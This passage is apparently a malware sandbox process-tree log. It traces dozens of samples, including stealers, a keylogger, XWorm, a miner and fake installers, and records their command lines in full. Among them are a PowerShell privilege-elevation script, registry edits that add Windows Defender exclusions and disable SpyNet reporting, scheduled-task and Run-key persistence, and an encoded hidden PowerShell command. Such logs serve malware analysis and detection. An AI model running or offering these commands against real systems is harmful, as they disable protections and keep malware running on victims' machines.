        PID:5552
      - C:\Users\Admin\AppData\Local\Temp\is-1HO1S.tmp\is-3EKQA.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1HO1S.tmp\is-3EKQA.tmp" /SL4 $104BE "C:\Users\Admin\Desktop\a\tuc3.exe" 5597940 141824
        6⤵
        
        PID:6332
        
        C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1121.exe
        
        "C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1121.exe" -i
        7⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\net.exe
        
        "C:\Windows\system32\net.exe" helpmsg 2
        7⤵
        
        PID:6276
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 helpmsg 2
        8⤵
        
        PID:5284
        
        C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1121.exe
        
        "C:\Program Files (x86)\Smart Projects\IsoBuster\IsoBuster_1121.exe" -s
        7⤵
        
        PID:7144
    - - C:\Users\Admin\Desktop\a\system12.exe
        
        "C:\Users\Admin\Desktop\a\system12.exe"
        5⤵
        
        PID:6304
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /k cmd < Personnel & exit
        6⤵
        
        PID:6944
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        7⤵
        
        PID:7780
    - - C:\Users\Admin\Desktop\a\StealerClient_Sharp.exe
        
        "C:\Users\Admin\Desktop\a\StealerClient_Sharp.exe"
        5⤵
        
        PID:5216
    - - C:\Users\Admin\Desktop\a\32.exe
        
        "C:\Users\Admin\Desktop\a\32.exe"
        5⤵
        
        PID:6612
    - - C:\Users\Admin\Desktop\a\KL.exe
        
        "C:\Users\Admin\Desktop\a\KL.exe"
        5⤵
        
        PID:6552
      - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:5956
    - - C:\Users\Admin\Desktop\a\arinzezx.exe
        
        "C:\Users\Admin\Desktop\a\arinzezx.exe"
        5⤵
        
        PID:6936
      - C:\Users\Admin\Desktop\a\arinzezx.exe
        
        "C:\Users\Admin\Desktop\a\arinzezx.exe"
        6⤵
        
        PID:7724
      - C:\Users\Admin\Desktop\a\arinzezx.exe
        
        "C:\Users\Admin\Desktop\a\arinzezx.exe"
        6⤵
        
        PID:7788
    - - C:\Users\Admin\Desktop\a\aww.exe
        
        "C:\Users\Admin\Desktop\a\aww.exe"
        5⤵
        
        PID:7124
    - - C:\Users\Admin\Desktop\a\TrueCrypt_yhvFvl.exe
        
        "C:\Users\Admin\Desktop\a\TrueCrypt_yhvFvl.exe"
        5⤵
        
        PID:6120
    - - C:\Users\Admin\Desktop\a\agodzx.exe
        
        "C:\Users\Admin\Desktop\a\agodzx.exe"
        5⤵
        
        PID:6756
      - C:\Users\Admin\Desktop\a\agodzx.exe
        
        "C:\Users\Admin\Desktop\a\agodzx.exe"
        6⤵
        
        PID:7544
    - - C:\Users\Admin\Desktop\a\patch.exe
        
        "C:\Users\Admin\Desktop\a\patch.exe"
        5⤵
        
        PID:4832
    - - C:\Users\Admin\Desktop\a\setup.exe
        
        "C:\Users\Admin\Desktop\a\setup.exe"
        5⤵
        
        PID:1128
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # Elevate privileges if (-not (IsAdministrator)) { $proc = New-Object System.Diagnostics.Process $proc.StartInfo.WindowStyle = 'Hidden' $proc.StartInfo.FileName = [System.Diagnostics.Process]::GetCurrentProcess().MainModule.FileName $exclusionPaths = '${env:ProgramData}','${env:AppData}','${env:SystemDrive}\\' $proc.StartInfo.Arguments = '-Command "Add-MpPreference -ExclusionPath ""' + ($exclusionPaths -join ',') + '"""' $proc.StartInfo.UseShellExecute = $true $proc.StartInfo.Verb = 'runas' $proc.StartInfo.CreateNoWindow = $true try { $proc.Start() | Out-Null $proc.WaitForExit() | Out-Null [Environment]::Exit(1) } catch [System.ComponentModel.Win32Exception] { if ($AdminRightsRequired) { continue } else { break } } } else { break } } } function IsAdministrator { $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $principal = New-Object System.Security.Principal.WindowsPrincipal($identity) return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator) } Get-Win"
        6⤵
        
        PID:2188
      - C:\Users\Admin\Desktop\a\win.exe
        
        "C:\Users\Admin\Desktop\a\win.exe" x -o- -pjryj2023 .\plugin1.rar .\
        6⤵
        
        PID:2848
      - C:\Users\Admin\Desktop\a\setups.exe
        
        "C:\Users\Admin\Desktop\a\setups.exe"
        6⤵
        
        PID:7148
    - - C:\Users\Admin\Desktop\a\cbchr.exe
        
        "C:\Users\Admin\Desktop\a\cbchr.exe"
        5⤵
        
        PID:6476
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCFD7.tmp.bat""
        6⤵
        
        PID:7244
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:8256
        
        C:\Users\Admin\AppData\Roaming\calc.exe
        
        "C:\Users\Admin\AppData\Roaming\calc.exe"
        7⤵
        
        PID:6824
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"' & exit
        6⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "calc" /tr '"C:\Users\Admin\AppData\Roaming\calc.exe"'
        7⤵
        Creates scheduled task(s)
        
        PID:6912
    - - C:\Users\Admin\Desktop\a\shareu.exe
        
        "C:\Users\Admin\Desktop\a\shareu.exe"
        5⤵
        
        PID:7716
    - - C:\Users\Admin\Desktop\a\newrock.exe
        
        "C:\Users\Admin\Desktop\a\newrock.exe"
        5⤵
        
        PID:7796
    - - C:\Users\Admin\Desktop\a\1712.exe
        
        "C:\Users\Admin\Desktop\a\1712.exe"
        5⤵
        
        PID:4824
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
        6⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
        7⤵
        
        PID:7752
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c Copy "C:\Users\Admin\Desktop\a\1712.exe" "C:\Users\Admin\Documents\1712.pif"
        6⤵
        
        PID:7448
      - C:\Users\Admin\Desktop\a\1712.exe
        
        "C:\Users\Admin\Desktop\a\1712.exe"
        6⤵
        
        PID:8972
    - - C:\Users\Admin\Desktop\a\Ifum2.exe
        
        "C:\Users\Admin\Desktop\a\Ifum2.exe"
        5⤵
        
        PID:6200
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:8764
    - - C:\Users\Admin\Desktop\a\clip.exe
        
        "C:\Users\Admin\Desktop\a\clip.exe"
        5⤵
        
        PID:8868
    - - C:\Users\Admin\Desktop\a\v4install.exe
        
        "C:\Users\Admin\Desktop\a\v4install.exe"
        5⤵
        
        PID:6016
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\cMC3vG7uf0oG.vbe"
        6⤵
        
        PID:2848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\b7te9U2.bat" "
        7⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\agentServerComponent.exe
        
        "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet/agentServerComponent.exe"
        8⤵
        
        PID:7276
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bi5z14bx\bi5z14bx.cmdline"
        9⤵
        
        PID:5856
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB85C.tmp" "c:\Users\Admin\AppData\Local\MaxLoonaFest131\CSCFCB9FD696BCE488BBC415E2FD3145E4B.TMP"
        10⤵
        
        PID:5104
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0bxtmxfm\0bxtmxfm.cmdline"
        9⤵
        
        PID:196
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5F1.tmp" "c:\Users\Admin\AppData\Local\Temp\1000067001\CSC8189C8DDD86B4F8AA4C751E4F2FBC54F.TMP"
        10⤵
        
        PID:4932
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vo3rmydz\vo3rmydz.cmdline"
        9⤵
        
        PID:5456
    - - C:\Users\Admin\Desktop\a\Archevod_XWorm.exe
        
        "C:\Users\Admin\Desktop\a\Archevod_XWorm.exe"
        5⤵
        
        PID:520
    - - C:\Users\Admin\Desktop\a\easy.exe
        
        "C:\Users\Admin\Desktop\a\easy.exe"
        5⤵
        
        PID:1260
    - - C:\Users\Admin\Desktop\a\Helper.exe
        
        "C:\Users\Admin\Desktop\a\Helper.exe"
        5⤵
        
        PID:8592
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\Admin\Desktop\a\Helper.exe SETUPEXEDIR=C:\Users\Admin\Desktop\a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1700083086 "
        6⤵
        
        PID:5492
    - - C:\Users\Admin\Desktop\a\latestX.exe
        
        "C:\Users\Admin\Desktop\a\latestX.exe"
        5⤵
        
        PID:7884
    - - C:\Users\Admin\Desktop\a\RobluxCoins.exe
        
        "C:\Users\Admin\Desktop\a\RobluxCoins.exe"
        5⤵
        
        PID:448
      - C:\Windows\SYSTEM32\WerFault.exe
        
        WerFault
        6⤵
        
        PID:9048
    - - C:\Users\Admin\Desktop\a\xmrig.exe
        
        "C:\Users\Admin\Desktop\a\xmrig.exe"
        5⤵
        
        PID:8868
    - - C:\Users\Admin\Desktop\a\niceeyestrain.exe
        
        "C:\Users\Admin\Desktop\a\niceeyestrain.exe"
        5⤵
        
        PID:4004
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\whatgoal.exe
        6⤵
        
        PID:1896
    - - C:\Users\Admin\Desktop\a\Project_8.exe
        
        "C:\Users\Admin\Desktop\a\Project_8.exe"
        5⤵
        
        PID:8284
    - - C:\Users\Admin\Desktop\a\ofg7d45fsdfgg312.exe
        
        "C:\Users\Admin\Desktop\a\ofg7d45fsdfgg312.exe"
        5⤵
        
        PID:8820
      - C:\Windows\SysWOW64\SCHTASKS.exe
        
        SCHTASKS /Create /TR "C:\Users\Admin\Desktop\a\ofg7d45fsdfgg312.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:7944
    - - C:\Users\Admin\Desktop\a\hiuhehufw.exe
        
        "C:\Users\Admin\Desktop\a\hiuhehufw.exe"
        5⤵
        
        PID:8308
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\Admin\Desktop\a\hiuhehufw.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
        6⤵
        
        PID:9192
    - - C:\Users\Admin\Desktop\a\fortnite2.exe
        
        "C:\Users\Admin\Desktop\a\fortnite2.exe"
        5⤵
        
        PID:7016
    - - C:\Users\Admin\Desktop\a\fortnite3.exe
        
        "C:\Users\Admin\Desktop\a\fortnite3.exe"
        5⤵
        
        PID:8176
    - - C:\Users\Admin\Desktop\a\minuscrypt_crypted.exe
        
        "C:\Users\Admin\Desktop\a\minuscrypt_crypted.exe"
        5⤵
        
        PID:7092
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Users\Admin\Desktop\New Text Document.exe"
    3⤵
    PID:4420
  - - C:\Users\Admin\Desktop\New Text Document.exe
      "C:\Users\Admin\Desktop\New Text Document.exe"
      4⤵
      PID:1876
    - - C:\Users\Admin\Desktop\a\build.exe
        
        "C:\Users\Admin\Desktop\a\build.exe"
        5⤵
        
        PID:1296
    - - C:\Users\Admin\Desktop\a\amd.exe
        
        "C:\Users\Admin\Desktop\a\amd.exe"
        5⤵
        
        PID:5448
    - - C:\Users\Admin\Desktop\a\TrueCrypt_lDwnwJ.exe
        
        "C:\Users\Admin\Desktop\a\TrueCrypt_lDwnwJ.exe"
        5⤵
        
        PID:5744
      - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
        6⤵
        
        PID:6024
    - - C:\Users\Admin\Desktop\a\netTimer.exe
        
        "C:\Users\Admin\Desktop\a\netTimer.exe"
        5⤵
        
        PID:5564
    - - C:\Users\Admin\Desktop\a\secondumma.exe
        
        "C:\Users\Admin\Desktop\a\secondumma.exe"
        5⤵
        
        PID:6088
    - - C:\Users\Admin\Desktop\a\newmar.exe
        
        "C:\Users\Admin\Desktop\a\newmar.exe"
        5⤵
        
        PID:5140
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN newmar.exe /TR "C:\Users\Admin\Desktop\a\newmar.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:6696
    - - C:\Users\Admin\Desktop\a\Aasd2wdsdas.exe
        
        "C:\Users\Admin\Desktop\a\Aasd2wdsdas.exe"
        5⤵
        
        PID:6280
      - C:\Windows\SYSTEM32\WerFault.exe
        
        WerFault
        6⤵
        
        PID:7112
    - - C:\Users\Admin\Desktop\a\InstallSetup8.exe
        
        "C:\Users\Admin\Desktop\a\InstallSetup8.exe"
        5⤵
        
        PID:5372
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\pcwutl.dll,LaunchApplication "C:\Users\Admin\Desktop\New Text Document.exe"
    3⤵
    PID:4812
  - - C:\Users\Admin\Desktop\New Text Document.exe
      "C:\Users\Admin\Desktop\New Text Document.exe"
      4⤵
      PID:3644
    - - C:\Users\Admin\Desktop\a\TrueCrypt_vlBfql.exe
        
        "C:\Users\Admin\Desktop\a\TrueCrypt_vlBfql.exe"
        5⤵
        
        PID:5128
    - - C:\Users\Admin\Desktop\a\ama.exe
        
        "C:\Users\Admin\Desktop\a\ama.exe"
        5⤵
        
        PID:5600
      - C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe"
        6⤵
        
        PID:5912
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe" /F
        7⤵
        Creates scheduled task(s)
        
        PID:2144
    - - C:\Users\Admin\Desktop\a\audiodgse.exe
        
        "C:\Users\Admin\Desktop\a\audiodgse.exe"
        5⤵
        
        PID:5980
      - C:\Users\Admin\Desktop\a\audiodgse.exe
        
        "C:\Users\Admin\Desktop\a\audiodgse.exe"
        6⤵
        
        PID:4908
    - - C:\Users\Admin\Desktop\a\InstallSetup2.exe
        
        "C:\Users\Admin\Desktop\a\InstallSetup2.exe"
        5⤵
        
        PID:5212
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:6788
        
        C:\Users\Admin\Pictures\hZkmz0DfD2dg65iD39Vo6xEd.exe
        
        "C:\Users\Admin\Pictures\hZkmz0DfD2dg65iD39Vo6xEd.exe"
        7⤵
        
        PID:3520
        
        C:\Users\Admin\Pictures\IetToJvCuExoVW3CE53r6ULw.exe
        
        "C:\Users\Admin\Pictures\IetToJvCuExoVW3CE53r6ULw.exe"
        7⤵
        
        PID:7932
        
        C:\Users\Admin\Pictures\JuUUHx37GhjGuI86irFCeGHc.exe
        
        "C:\Users\Admin\Pictures\JuUUHx37GhjGuI86irFCeGHc.exe"
        7⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        8⤵
        
        PID:5236
        
        C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe
        
        "C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe" --silent --allusers=0
        7⤵
        
        PID:7216
        
        C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe
        
        C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x314,0x318,0x31c,0x310,0x2ec,0x69f674f0,0x69f67500,0x69f6750c
        8⤵
        
        PID:2756
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LUB3VyxD8F7PwCvIsv0LjuBU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LUB3VyxD8F7PwCvIsv0LjuBU.exe" --version
        8⤵
        
        PID:6028
        
        C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe
        
        "C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=7216 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231118161730" --session-guid=c63537ae-d4a1-4fee-a9df-fe0f9ad752be --server-tracking-blob=YTY0NDE3M2MwOWE1ZmIwMWI3NDQ4MTJkYmYyZDkwNzMzNzkwNmUwZWM3ZGI0OTEyOGYwYjliMzU5YzRhMTIyZjp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDMyNDIwMy45NDE0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIwMjJjMmRlMS0yNTgzLTRkNWYtYTRkZC1iMDBlZTc5MmE5ZTUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=CC04000000000000
        8⤵
        
        PID:7420
        
        C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe
        
        C:\Users\Admin\Pictures\LUB3VyxD8F7PwCvIsv0LjuBU.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x310,0x320,0x324,0x2ec,0x328,0x693e74f0,0x693e7500,0x693e750c
        9⤵
        
        PID:8544
        
        C:\Users\Admin\Pictures\93uJQgUI7b4vksebT7y8g4B2.exe
        
        "C:\Users\Admin\Pictures\93uJQgUI7b4vksebT7y8g4B2.exe"
        7⤵
        
        PID:7516
        
        C:\Users\Admin\AppData\Local\Temp\7zS7B34.tmp\Install.exe
        
        .\Install.exe
        8⤵
        
        PID:5740
        
        C:\Users\Admin\AppData\Local\Temp\7zSBF42.tmp\Install.exe
        
        .\Install.exe /pdidc "385118" /S
        9⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        10⤵
        
        PID:8424
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        11⤵
        
        PID:8860
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        12⤵
        
        PID:8044
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        12⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        10⤵
        
        PID:6476
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        11⤵
        
        PID:3904
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        12⤵
        
        PID:7272
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        12⤵
        
        PID:8228
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gbOCGKQTo" /SC once /ST 14:53:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        10⤵
        Creates scheduled task(s)
        
        PID:7608
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gbOCGKQTo"
        10⤵
        
        PID:7628
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gbOCGKQTo"
        10⤵
        
        PID:7016
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bFvsKFifcttmubYYTU" /SC once /ST 16:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\zwZDlFG.exe\" 1c /fGsite_idNqU 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:5892
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bFvsKFifcttmubYYTU"
        10⤵
        
        PID:8300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "uaXipkbyxrnNFDdtl" /SC once /ST 10:10:50 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\MUUrhclBcrYRTMx\VnWojVg.exe\" ix /FPsite_idpsG 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:7728
        
        C:\Users\Admin\Pictures\H4VBLUd2gosYVcoEjDqibvIY.exe
        
        "C:\Users\Admin\Pictures\H4VBLUd2gosYVcoEjDqibvIY.exe"
        7⤵
        
        PID:5928
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        8⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
        
        C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
        8⤵
        
        PID:7936
        
        C:\Users\Admin\Pictures\xrVhZAp7z1YqMUyckfCkDGsA.exe
        
        "C:\Users\Admin\Pictures\xrVhZAp7z1YqMUyckfCkDGsA.exe"
        7⤵
        
        PID:9020
        
        C:\Users\Admin\Pictures\CNHlE1L3Kw9zKtXN5ROT7wIl.exe
        
        "C:\Users\Admin\Pictures\CNHlE1L3Kw9zKtXN5ROT7wIl.exe"
        7⤵
        
        PID:7764
        
        C:\Users\Admin\Pictures\iqPc9yCgoLtIZin656bIFZC9.exe
        
        "C:\Users\Admin\Pictures\iqPc9yCgoLtIZin656bIFZC9.exe" --silent --allusers=0
        7⤵
        
        PID:5712
        
        C:\Users\Admin\Pictures\iqPc9yCgoLtIZin656bIFZC9.exe
        
        C:\Users\Admin\Pictures\iqPc9yCgoLtIZin656bIFZC9.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x310,0x314,0x318,0x2ec,0x31c,0x680174f0,0x68017500,0x6801750c
        8⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iqPc9yCgoLtIZin656bIFZC9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\iqPc9yCgoLtIZin656bIFZC9.exe" --version
        8⤵
        
        PID:5420
        
        C:\Users\Admin\Pictures\GrfAcMle5WbEtQfvznV0bDfY.exe
        
        "C:\Users\Admin\Pictures\GrfAcMle5WbEtQfvznV0bDfY.exe"
        7⤵
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\7zSE0A.tmp\Install.exe
        
        .\Install.exe
        8⤵
        
